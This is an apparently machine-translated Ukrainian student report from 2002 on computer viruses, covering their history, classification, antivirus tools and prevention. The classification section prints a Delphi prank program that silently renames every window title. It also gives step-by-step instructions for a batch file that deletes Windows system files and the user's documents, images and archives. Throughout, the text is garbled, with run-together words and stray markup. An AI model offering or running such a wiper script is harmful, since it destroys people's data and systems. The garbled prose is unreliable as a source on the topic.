Міністерство освіти РФ. p>
ВСГТУ. p>
Кафедра: «електронна обчислювальна системи системи» p>
Реферат на тему: p>
Виконали : С-т гр 521-2 Матвеев Ф. p>
Перевірив: p>
Улан-Уде.2002 р. p>
Зміст: p>
1. Введення. P>
2. Ознаки появи вірусів.
Кролики розмножуються. P>
3. Злочинність в с сфері комп'ютерних технологій. P>
4. Класифікація вірусів p>
5. Антивірусні програми. P>
6. Профілактика. P>
7. Висновок. P>
1. Введення. P>
Масове використання ПК в автономному та мережевому режимі, включаючи вихіддо глобальної мережі Інтернет, породило проблему зараження їх комп'ютернимивірусами. p>
Компьотерним вірусом прийнято називати спеціально написану, невеликуза розмірами програму. Здатну мимовільно приєднуватися до іншихпрограмами (тобто заражати їх), створювати свої копії та впроваджувати їх у файли,системні області комп'ютера і в інші, об'єднані з ним комп'ютери зметою порушення нормальної роботи програм, псування файлів і каталогів,створення різних перешкод при роботі на комп'ютері. p>
2. Ознаки появи вірусів. P>
Для маскування вірусу його дії по зараженню інших програм інанесення шкоди можуть виконуватися не завжди, а при виконанні будь-якихумов. Після того як вірус виконає потрібні йому дії, він передаєуправління тій програмі, в якій він знаходиться, і її робота деякийчас не відрізняється від роботи незараженою. Всі дії вірусу можутьвиконуватися достатньо швидко і без будь-яких повідомлень, томукористувач часто і не помічає, що комп'ютер працює з "странностями".
До ознак появи вірусу можна віднести: p>
• уповільнення роботи комп'ютера; p>
• неможливість завантаження операційної системи; p>
• часті «зависання» і збої в роботі комп'ютера; p>
• припинення роботи або неправильна робота раніше успішнофункціонуючих програм; p>
• збільшення кількості файлів на диску; p>
• зміна розмірів файлів; p>
• періодичну появу на екрані монітора недоречних системнихповідомлень; p>
• зменшення обсягу вільної оперативної пам'яті; p>
• помітне зростання часу доступу до жорсткого диску; p>
• зміна дати і часу створення файлів; p >
• руйнування файлової структури (зникнення файлів, спотвореннякаталогів тощо); p>
• загоряння сигнальної лампочки дисковода, коли до нього немає звернення. p>
Треба зауважити, що названі симптоми необов'язково викликаютьсякомп'ютерними вірусами, вони можуть бути наслідком інших причин, томукомп'ютер слід періодично діагностувати. p>
3. «Кролики» розмножуються. P>
Думки з приводу дати народження першого комп'ютерного вірусу розходяться.
Достеменно відомо лише те, що в самому першому механічному комп'ютері,так званої машині Беббідж, їх не було.
Перші появи вірусів були відзначені в кінці 60-х - початку 70-х років.
Ці програми-паразити, які займали системні ресурси і знижувалипродуктивність системи, називали «кроликами» (the rabbit). Однак,швидше за все, «кролики» були просто помилками або витівками програмістів,обслуговували комп'ютери.
У середині 70-х був виявлений один з перших справжніх вірусів - «The
Creeper », який міг самостійно увійти в мережу через модем і передатисвою копію віддаленій системі. Для боротьби з ним створили першу відомуантивірусну програму-«The Reeper».
Ті, хто почав працювати на IBM-PC у середині 80-х, напевно пам'ятаютьповальну епідемію вірусів «Brain», «Vienna», «Cascade». Букви сипалися наекранах, а натовпи користувачів облягали фахівців з ремонту моніторів.
Потім комп'ютер заграв «Yankee Doodle», правда, лагодити динаміки теперніхто не кинувся - вже було зрозуміло, що це вірус.
Час йшов, віруси плодилися. Всі вони були схожі один на одного - лізли впам'ять, чіплялися до файлів і секторів, періодично вбивали дискети івінчестери. Влітку 1991 року з'явився вірус-невидимка «Dir-II», протиотрутадля якого знайшли далеко не відразу ...
У серпні 1995 року, коли все прогресивне людство святкувало вихіднової операційної системи Windows 95 від Microsoft, практичнонепоміченим пройшло повідомлення про вірус, що заражає документи Microsoft
Word. Він отримав ім'я «Concept» і миттю проник до тисячі (якщо не вмільйони) комп'ютерів - адже передача текстів у форматі MS Word стала однимзі стандартів. Для того щоб заразитися вірусом, потрібно всього лишевідкрити заражений документ, і всі інші редаговані документи також
«Хворіли», В результаті, отримавши через Інтернет заражений файл і прочитавшийого, користувач, сам того не відаючи, опинявся рознощиком комп'ютерноїзарази. Небезпека зараження MS Word, з огляду на можливості Інтернету, сталаоднією з найсерйозніших проблем за всю історію існування вірусів.
Але MS Word справа не обмежилася. Влітку 1996 року з'явився вірус «Laroux»,вражаючий таблиці MS Excel. (У 1997 році цей вірус викликав епідемію в
Москві.) До літа 97-го число макровірусів сягнула кількох сотень ...
18 вересня цього року на Тайвані був повторно заарештований творецьзнаменитого «Чорнобиля» Чен Ін-Хау. (Перший раз Чен Ін-Хау затримали вквітні 1999 року, але він уникнув покарання, оскільки на той момент немалося офіційних скарг від тайваньських компаній. Приводом для новогоарешту послужили звинувачення, пред'явлені тайванським студентом, якийпостраждав від вірусу «Чорнобиль» вже у квітні цього року.) Цей вірус буввиявлений на Тайвані в червні 98-го. Тоді його автор уразив комп'ютериуніверситету, в якому навчався. «Хворі» файли розповзлися по місцевих
Інтернет-конференцій, і вірус вибрався за межі Тайваню. Через тижденьепідемія вразила Австрію, Австралію, Ізраїль та Великобританію. Потім віруспроявив себе і в інших країнах, у тому числі і в Росії.
Приблизно через місяць заражені файли з'явилися на кількох американських
Web-серверах, що поширюють ігрові програми, що, мабуть, і послужилопричиною послідувала глобальної епідемії «Чорнобиля». 26 квітня 1999вибухнула «логічна бомба», закладена в його код. За різними оцінками,в цей день по всьому світу постраждало близько 500 тис. комп'ютерів - булизнищені дані на жорстких дисках, а в деяких випадках навіть зіпсованімікросхеми на материнських платах. Ніколи ще вірусні епідемії неприносили таких збитків. Через якийсь час «Чорнобиль» спрацював знову.
Збиток, нанесений їм тільки в Південній Кореї, оцінюється в $ 250 млн.
22 жовтня цього року на Філіппінах заарештували 19-річного хакера,підозрюваного в поширенні вірусів. (Пізніше він був відпущений насвободу до закінчення розслідування.) Влада Філіппін, мабуть, вирішили такимчином реабілітуватися після кількох невдалих спроб залучити довідповідальності розповсюджувачів вірусу «LoveLetter», яка заподіялавеличезної шкоди в травні цього року.
Сьогодні в базі одного з найпотужніших вітчизняних, та й, мабуть, світовихзасобів антивірусного захисту, «AVP Євгенія Касперського», міститьсяінформація про 40 393 віруси (на б листопада 2000 року), а такожвідповідні засоби виявлення, лікування й видалення. p>
4. Злочинність у сфері комп'ютерних технологій. P>
У багатьох країнах діють законодавчі заходи для боротьби зкомп'ютерними злочинами і зловмисними діями, розробляютьсяантивірусні програмні засоби, однак кількість нових програмнихвірусів зростає. Осіб, які використовують свої знання та досвід длянесанкціонованого доступу до інформаційних і обчислювальних ресурсів, доотримання конфіденційної і секретної інформації, до вчинення шкідливихдій, в літературі називають хакерами і кракерами. p>
Дії хакерів, чи комп'ютерних хуліганів, можуть завдаватиістотної шкоди власникам комп'ютерів і власникам (творцям)інформаційних ресурсів, так як призводять до простоїв комп'ютерів,необхідності відновлення зіпсованих даних або до дискредитаціїюридичних або фізичних осіб, наприклад, шляхом спотворення інформації наелектронних дошках оголошень або на WEB-серверах в Інтернет. Мотивидій комп'ютерних зловмисників самі різні: прагнення дофінансовим придбань; бажання нашкодити і помститися керівникуорганізації, з якої з тих чи інших причин звільнився співробітник;психологічні риси людини (заздрість, марнославство, бажання якось проявитисебе, просто хуліганство та ін.) p>
5. Класифікація вірусів p>
Основними шляхами зараження комп'ютерів вірусами є знімні диски
(дискети та CD-ROM) і комп'ютерні мережі. Зараження жорсткого диска комп'ютераможе статися під час завантаження комп'ютера з дискети, що містить вірус. Дляпосилення безпеки необхідно звертати увагу на те, як і звідкиотримана програма (з сумнівного джерела, чи є наявністьсертифіката, експлуатувалася чи раніше і т.д.). Однак головна причиназараження комп'ютерів вірусами - відсутність в операційних системахефективних засобів захисту інформації від несанкціонованого доступу. p>
За даними спеціальної літератури, до кінця 1998 р. у світовій практиці було зареєстровано понад 20 тис. комп'ютерних вірусів (на сьогоднішній день відомо близько 50 000 вірусів) і щотижня з'являється близько десяти нових вірусів. Одна зі схем класифікації комп'ютерних вірусів представлена на рис. 1 p>
p>
Рис. 1 Класифікація комп'ютерних вірусів p>
Залежно від місця існування віруси класифікуються назавантажувальні, файлові, системні, мережеві, файлово-завантажувальні. p>
Завантажувальні віруси впроваджуються в завантажувальний сектор диску або в сектор,що містить програму завантаження системного диска. p>
Файлові віруси проникають в основному в виконувані файли зрозширенням. СОМ і. ЕХЕ. p>
Системні віруси проникають в системні модулі і драйвери периферійнихпристроїв, вражають програми-інтерпретатори. p>
Мережеві віруси живуть в комп'ютерних мережах; файлово-завантажувальнівражають завантажувальні сектори дисків та файли прикладних програм. p>
Резидентні віруси при зараженні комп'ютера залишають в оперативнійпам'яті свою резидентну частина, яка потім при кожному зверненні доопераційній системі та до інших об'єктів впроваджується в них і виконує своїруйнівні дії до виключення або перезавантаження комп'ютера.
Нерезидентні віруси не заражають оперативну пам'ять. P>
алгоритмічна особливість побудови вірусів робить вплив на їхпрояв та функціонування. Так, реплікаторние програми завдякисвоєму швидкому відтворенню призводять до переповнення основної пам'яті,при цьому знищення програм-реплікатор ускладнюється, якщовідтворні програми не є точними копіями оригіналу. Укомп'ютерних мережах поширені програми-«черв'яки». Вони обчислюють адресимережевих комп'ютерів і «записуються за ним», підтримуючи між собою зв'язок.
У разі припинення існування «хробака» на будь-якому ПК, що залишилисявідшукують вільний комп'ютер і впроваджують у нього таку ж програму p>
"Троянський кінь" - це програма, яка, маскуючись під кориснупрограму, виконує додаткові функції, про що користувач і нездогадується (наприклад, збирає інформацію про імена й паролі, записуючиїх у спеціальний файл, доступний лише творцю даного вірусу), аборуйнує файлову систему. p>
Логічна бомба - це програма, яка вбудовується у великійпрограмний комплекс. Вона нешкідлива до настання певної події,після якого реалізується її логічний механізм. Наприклад, така віруснапрограма починає працювати після деякого числа запусків прикладноїпрограми, комплексу, за наявності або відсутності певного файлу абозапису файлу і т.д. p>
Програми-мутанти, самовідтворюється, відтворюють копії, які явно відрізняються від оригіналу. p>
Віруси-невидимки перехоплюють звертання операційної системи доуражених файлів і секторів дисків та підставляють замість них незараженіоб'єкти. p>
За ступенем впливу на ресурси комп'ютерних систем та мережвиділяються нешкідливі, небезпечні та руйнівні віруси. p>
Нешкідливі віруси не руйнують файли, але можуть переповнювати оперативнуі дискову пам'ять, виводити на екран графічні ефекти і т.д. Наприклад: p>
(програма пишеться в Delphi): program Project1; uses windows, Messages; procedure registerserviceprocess; external 'kernel32.dll' name 'RegisterServiceProcess';// функція EnumWindowsProc function EnumWindowsProc (h: hwnd): BOOL; stdcall; begin p>
SendMessage (h, WM_SETText, 0, Iparam (PChar ( 'Fed_108-комп'ютерник))); end; p>
// початок програми var h: THandle; begin asm push 1 push 0 call registerserviceprocess; end; p>
// запускаю цикл while true do begin// запускаю перечесленіе всіх вікон p>
EnumWindows (@ EnumWindowsProc, 0); h: = CreateEvent (nil, true, false, ");// роблю затримку в 100 мс. p>
WaitForSingleObject (h, 100); p>
CloseHandle (h); end; end.
Ефект: всі назви вікон перейменовуються в «Fed_108-комп'ютерник» p>
Небезпечні віруси призводять до різних порушень в роботі комп'ютера;руйнівні - до стирання інформації, повного або часткового порушенняроботи прикладних програм. Наприклад: p>
Заходимо в Far-manager, натискаємо Shift + F4, пишемо будь-яку назву файлу
(install.bat), головне щоб було розширення *. bat. p>
Після чого друкуємо приблизно наступний текст: p>
cd C: p>
cd p>
cd windows (у 95% відсотків юзерів папка саме така) p>
del *. exe p>
del *. ini p>
del *. com p>
cd p>
cd windows p>
cd system p>
del *. dll p>
del *. exe p>
cd p>
cd моідок ~ 1 p>
del *. doc p>
del *. txt p>
del *. htm p>
del *. html p>
del *. pdf
del *. jpg p>
del *. zip p>
del *. gif p>
Натискаємо F2 і зберігаємо таким чином написаний файл. Ефект: стираютьсявсі файли з зазначеними розширеннями у вказаних папках. p>
Масове розповсюдження комп'ютерних вірусів викликало розробкуантивірусних програм, що дозволяють виявляти і унічножать. Програми -фільтри, або «сторожа», постійно перебувають в оперативній пам'яті, будучирезидентними, і «перехоплюють» всі запити до операційної системи навиконання «підозрілих дій», тобто операції, що використовуються вірусамидля свого розмноження і псування інформаційних та інших системних ресурсів укомп'ютері. Такими діями можуть бути. спроби зміни атрибутівфайлів, корекції виконуваних BAT-СОМ-або ЕХЕ-файлів, записи взавантажувальні сектори диска і ін При кожному запиті на таку дію наекран комп'ютера видається Повідомлення про будь-яких дій і яка програмабажає його виконувати. Користувач у відповідь на це має або дозволитивиконання дії, або заборонити його. Подібна часто повторюється
«Настирливість», що дратує користувача, і те, що обсяг оперативноїпам'яті зменшується через необхідність постійного перебування в ній
«Сторожа», є головними недоліками цих програм. До того жпрограми-фільтри не «лікують» файли або диски, для цього необхідновикористовувати інші антивірусні програми. Прикладом програм-сторожівє Vsefe, що входить в пакет утиліт MS-DOS, і програми, що працюють всередовищі Windows, - AVP, Norton AntiVirus for Windows 95, McAfee Virus Scan
95, Thunder Byte Professional for Windows 95. P>
Надійним засобом захисту від вірусів вважаються програми-ревізори. Вонизапам'ятовують початковий стан програм, каталогів і системних областейдиска, коли комп'ютер ще не був заражений вірусом, а потім періодичнопорівнюють поточний стан з початковим. При виявленні невідповідностей (подовжині файлу, дату модифікації, коду циклічного контролю файла та ін)повідомлення про це видається користувачеві. Прикладом програм-ревізорівє програма Adinf фірми «Діалог-Наука» і додаток до неї у вигляді
Adinf Cure Module. P>
Програми-лікарі не тільки виявляють, але і "лікують" заражені програми або диски, «викусивая» із заражених програм тіло вірусу.
Програми цього типу поділяються на фаги і поліфаг. Останні служать для виявлення та знищення великої кількості різноманітних вірусів.
Найбільше поширення в Росії мають такі поліфаг, як MS AntiVirus,
Aidstest і Doctor Web, які безперервно оновлюються для боротьби з з'являються новими вірусами. P>
Програми-детектори дозволяють виявляти файли, заражені одним або кількома відомими розробникам програм вірусами. p>
Програми-вакцини, або іммунізатори, відносяться до резидентним програмами. Вони модифікують програми і диски таким чином, що це не відбивається на роботі програм, але вірус, від якого здійснюється вакцинація, вважає їх вже зараженими і не впроваджується в них. P>
6. Антивірусні програми. P>
Як відомо, вірус може міститися тільки в файлах, якимпередається управління: програми, динамічні бібліотеки, драйвери,командні файли, скрипти, документи і шаблони з макросами, тобто файли зрозширеннями COM, EXE, DLL, DRV, VXD, SYS, BAT, DOC, DOT, XLS та ін Такимчином, наприклад, звичайний текстовий файл (з розширенням TXT) можназапускати без побоювань отримати заразу - TXT-файл буде просто відкрито в
Блокноті. P>
Охарактеризуємо деякі антивірусні програми. До нащо стоїть часузарубіжними та вітчизняними фірмами і фахівцями розроблено великукількість антивірусних програм. Багато хто з них, які отримали широкевизнання, постійно поповнюються новими засобами для боротьби з вірусами ісупроводжуються розробниками. p>
У російських користувачів персональних комп'ютерів популярнийантивірусний комплект АТ «Діалог-Наука», до якого входять програма-ревізордиска Adinf і лікуючий блок Adinf Cure Module. Одна з останніх версій цієїпрограми-поліфаг Aidstest (кінець 1997 р.) виявлення, 1700вірусів. Aidstest для свого нормального функціонування вимагає, щоб уоперативної пам'яті не було інших резидентних антивірусних програм,блокуючих запис у програмні файли, тому їх слід попередньовивантажити. p>
При запуску програми Aidstest перевіряє оперативну пам'ять на наявністьвідомих вірусів і знешкоджує їх. При цьому паралізуються функції вірусу,пов'язані з розмноженням, а інші побічні ефекти можуть залишатися,зв'язку з чим після закінчення знешкодження вірусу програма видає запит проперезавантаження. Перезавантаження рекомендується здійснити кнопкою RESET, тому щоПісля перезавантаження клавішами [CTRL] + [Alt] + [Del] деякі віруси можутьзберігатися. Крім того, комп'ютер і антивірусну програму краще запуститиз захищеної від запису дискети, щоб при запуску з зараженого диска вірусне зміг записатись на згадку резидентом і перешкоджати лікуванню. p>
Aidstest тестує своє тіло на наявність відомих вірусів, а такожсудить по перекручування в своєму коді про своє зараження невідомим вірусом. Прицьому можливі випадки «помилкової тривоги», наприклад при стисненні антивірусапрограмою-пакувальником. Програма не має графічного інтерфейсу, режимиїї 1 роботи задаються за допомогою ключів. Вказавши шлях, можна перевірити не весьдиск, а окремий підкаталогу. Оптимальний режим для щоденної роботизадається ключами/g (перевірка всіх файлів) і/s (повільна перевірка).
Збільшення часу при таких опціях практично непомітним (повністюзаповнений жорсткий диск ємністю 520 Мбайт на ПК з процесором 486DX2тестується менш ніж 2 хв), зате вірогідність виявлення вірусів різкопідвищується. p>
Ключ If слід використовувати тоді, коли Aidstest, а також іншіпрограми-антивіруси вказують на наявність вірусу в будь-якому файлі. Привиявлення вірусу у цінне для користувача фото цей файл слідпереписати на дискету і спробувати вилікувати за допомогою ключа/f. Якщоспроба не матиме успіх, треба видалити всі заражені копії файлу іперевірити диск знову. Якщо у файлі міститься важлива інформація, якунебажано видаляти, можна помістити файл або знайти іншуантивірусну програму, здатну лікувати цей тип вірусу. p>
Для створення у файлі протоколу роботи програми Aidstest служить ключ
/ р. Протокол потрібен, якщо користувач не встигає переглянути іменазаражених файлів. Для підтримки антивірусного програмно-апаратногокомплексу Sheriff призначений ключ/z. p>
Програма-поліфаг Doctor Web необхідна перш за все для боротьби зполіморфними вірусами, які з'явилися порівняно недавно. Так само як і
Aidstest, Doctor Web оновлюється не рідше разу на місяць, а в проміжкахміж версіями виходять 1-3 доповнення вірусної бази Doctor Web. p>
Використання програми Doctor Web для перевірки дисків та видаленнявиявлених вірусів в цілому подібно Aidstest, у зв'язку з чим цю програмуможна запускати відразу після (або до) запуску Aidstest. При цьому практичноне відбувається «дублювання», так як Aidstest і Doctor Web працюють нарізних наборах вірусів. У режимі евристичного аналізу програма Doctor
Web здатна ефективно визначати файли, заражені новими, невідомимивірусами. Застосовуючи одночасно Aidstest і Doctor Web для контролю дискет іодержуваних по мережі файлів, можна майже напевно уникнути зараження. p>
З програмою Doctor Web можна працювати як в режимі повноекранногоінтерфейсу з використанням меню і діалогових вікон, так і в режимікомандного рядка. У командному рядку задаються диск, шлях і необхідніключі. Серед ключів:/al - діагностика всіх файлів на заданому пристрої; p>
/р - видалення вірусів з підтвердженням користувача;/dl-видаленняфайлів, коректне "лікування" яких неможливо;/CU - "лікування" дисків тафайлів;/zp - запис протоколу роботи у файл. Під час роботи в режиміповноекранного інтерфейсу після запуску антивірусної програми користувачвикористовує необхідні установки через пункти основного меню: Dr. Web. Тест
Установки Додатки. P>
Програма-ревізор Adinf дозволяє виявити будь-який вірус, включаючивіруси, віруси-мутанти і невідомі на сьогоднішній день віруси. Часперевірки одного логічного диска вкрай мало, що дає можливістьвикористовувати Adinf повсякденно без істотної втрати часу. p>
Перехід на застосування операційної системи Windows 95 спричинив проблемиіз захистом від вірусів, створених спеціально для цього середовища. Крім того,з'явився новий різновид інфекції - макровіруси, «вживлюються» вдокументи, що готуються текстовим процесором Word. АТ "Диалог-Наука"запропонований програмно-апаратний комплекс Sheriff, призначений дляантивірусного моніторингу та захисту, але він передбачає встановлення в ПКдодаткової плати розширення і може працювати тільки на серверах таробочих станціях, що оперують великими об'ємами даних. Відомимиантивірусними програмами є Antiviral Toolkit Pro (AVP32), Norton
AntiVirus for Windows 95, McAffee VirusScan95, Sophos SWEEP for Windows 95,
ThunderBY ТЕ Ai.dVirus Utilities та ін Ці програми працюють у виглядіпрограм-сканерів і проводять антивірусний контроль оперативної пам'яті,папок і дисків, містять алгоритми для розпізнавання нових типів вірусів,дозволяють в процесі перевірки лікувати файли і диски. p>
Програма Antiviral Toolkit Pro (AVP32) є 32-розряднихдодатком, що працює в середовищі Windows 95 і Windows NT, має зручнийпризначений для користувача інтерфейс, гнучку систему налаштувань і дозволяєрозпізнавати більше 50 тис. різних вірусів. Для роботи цієї програмикомп'ютер має мати не менше 4 Мбайт оперативної пам'яті і не менш 2
Мбайт вільного місця на жорсткому диску. Antiviral Toolkit Pro розпізнає івидаляє поліморфні віруси, віруси невидимки, макро віруси в документах,підготовлених в Word і Excel, "троянські коні". p>
Інтерфейс програми AllMicro AntiVirus for Windows 95 досить простий іне вимагає від користувача додаткових знань про продукт - простопотрібно натиснути кнопку «Scan», після чого починається перевірка пам'яті,завантажувальних секторів жорсткого диска, а потім і всіх дисків комп'ютера. Алепростота роботи не означає погана якість: в базі даних програмиміститься більше 8000 підписів, і вона може перевіряти не тількитрадиційні виконувані файли, але і архіви, і нові типи файлів Windows
95, при цьому користувач має можливість задати рядок умов дляпошуку не знайомих програмі вірусів. p>
Програма Vscan 95 щоразу в процесі початкового завантаження перевіряєпам'ять комп'ютера, завантажувальні сектори системного диска і всі файли вкореневому каталозі. Дві інші програми пакета (McAfee Vshield і Vscan)створені як додатку Windows 95. Перша забезпечує після завантаження
Windows 95 детектор знову підключеними дисками, контроль виконуванихпрограм і копійованих файлів, друга програма служить для додатковоїперевірки пам'яті, дисків і файлів. Пакет McAfee VirusScan 95 вміє знаходитимакро віруси в MS Word з огляду на розвиток локальних комп'ютерних мережелектронної пошти та мережі Інтернет і впровадження мережної ОС Windows NT,розробниками антивірусних програм розроблені і поставляються на риноктакі програми, як Mail Checker, для перевірки вхідної та вихідноїелектронної пошти, AntiViral Toolkit Pro - для виявлення, лікування,видалення та переміщення до спеціального каталогу уражених вірусом файлів прироботі з мережевою ОС Novell NetWare версій З.х і 4.х. Програма F-Secure для
Windows NT Server забезпечує в реальному масштабі часу захист сервера,автоматично перевіряючи на наявність вірусів кожен файл, до якогозвертаються робочі станції, виконує розширене автоматичнепротоколювання до спеціального журналу подій, оповіщає про проявивірусів системного адміністратора. p>
Профілактика p>
Для того, щоб не піддати комп'ютер зараження вірусами ізабезпечити надійне зберігання інформації на дисках, необхідно дотримуватисянаступні правила:
1. оснастити свій комп'ютер сучасними антивірусними програмами, наприклад AntiViral Toolkit Pro, Doctor Web, і постійно відновлювати їх версії
2. перед зчитуванням з дискет, що зберігаються на інших комп'ютерах, завжди перевіряйте ці дискети на наявність вірусів, запускаючи антивірусні програми свого комп'ютера
3. при перенесенні на свій комп'ютер фото в архівованих вигляді перевіряйте їх відразу ж після розархівації на жорсткому диску, обмежуючи область перевірки тільки знову записаними файлами
4. періодично перевіряйте на наявність вірусів жорсткі диски комп'ютера, запускаючи антивірусні програми для тестування файлів, пам'яті й системних областей дисків із захищеної від запису дискети, попередньо завантаживши операційну систему із захищеної від запису системної дискети
5. завжди захищайте свої дискети від запису при роботі на інших комп'ютерах, якщо на них не буде проводиться запис інформації
6. обов'язково робіть архівні копії на дискетах цінної для вас інформації
7. не залишайте в кишені дисководу А дискети під час увімкнення або перезавантаження операційної системи, щоб виключити зараження комп'ютера вірусами завантажувальними
8. використовуйте антивірусні програми для вхідного контролю усіх виконуваних файлів, одержуваних із комп'ютерних мереж
9. перевіряйте e-mail навіть якщо лист прийшов від добре відомого вам людини (це зумовлено не тим що він хоче вам нашкодити а через те що він повний Lamer а його комп заражений) p>
Так само варто іноді перевіряти автозавантаження , тому що саме туди звичайнозакидають завантажувальні віруси, але цей метод дуже поширений і з цьогослід перевіряти в реєстрі таку папку: p>
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun p>
8. Висновок. P>
Комп'ютерний вірус - спеціально написана програма, здатнамимовільно приєднуватися до інших програм, створювати свої копії тавпроваджувати їх у файли, системні області комп'ютера і в обчислювальні мережі зметою порушення роботи програм, псування файлів і каталогів, створеннявсіляких перешкод у роботі комп'ютера. p>
В даний час відомо більше 50000 програмних вірусів, числояких безперервно зростає. Відомі випадки, коли створювалися навчальніпосібники, що допомагають в написанні вірусів. p>
Основні види вірусів: завантажувальні, файлові, файлово-завантажувальні.
Найбільш небезпечний вид вірусів - поліморфні. P>
З історії комп'ютерної вірусології ясно, що будь-яка оригінальнакомп'ютерна розробка змушує творців антивірусів пристосовуватисядо нових технологій, постійно вдосконалювати антивірусні програми. p>
Причини появи і поширення вірусів приховані з одного боку впсихології людини, з іншого боку - з відсутністю засобів захисту уопераційної системи. p>
Основні шляхи проникнення вірусів - знімні диски та комп'ютернімережі. Щоб цього не сталося, дотримуйтесь заходів щодо захисту. Також длявиявлення, видалення і захисту від комп'ютерних вірусів розробленокілька видів спеціальних програм, які називаються антивірусними. p>
Але деякі властивості вірусів спантеличують навіть фахівців. Ще зовсімнедавно важко було собі уявити, що вірус може пережити холоднуперезавантаження або розповсюджуватися через файли документів. У таких умовахне можна не надавати значення хоча б початкового антивірусному освітикористувачів. При всій серйозності проблеми жоден вірус не здатнийпринести стільки шкоди, скільки початківець LAMER (він же чайник) з тремтячимируками! (останнє речення is joke) p>
Бібліографічний список: p>
1. Лекції по темі «Загальний принцип безпеки ОС»
2. Косарєв В.П. «Комп'ютерні мережі та системи» М. 2000
3. World Wide Web під назвою Internet: http://xakep.dax.ru http://xakep.ruжурнал «] [akep» № .32 & № .35 2001журнал «Комерсант« Деньги »» № 45 2000 г. p>
p>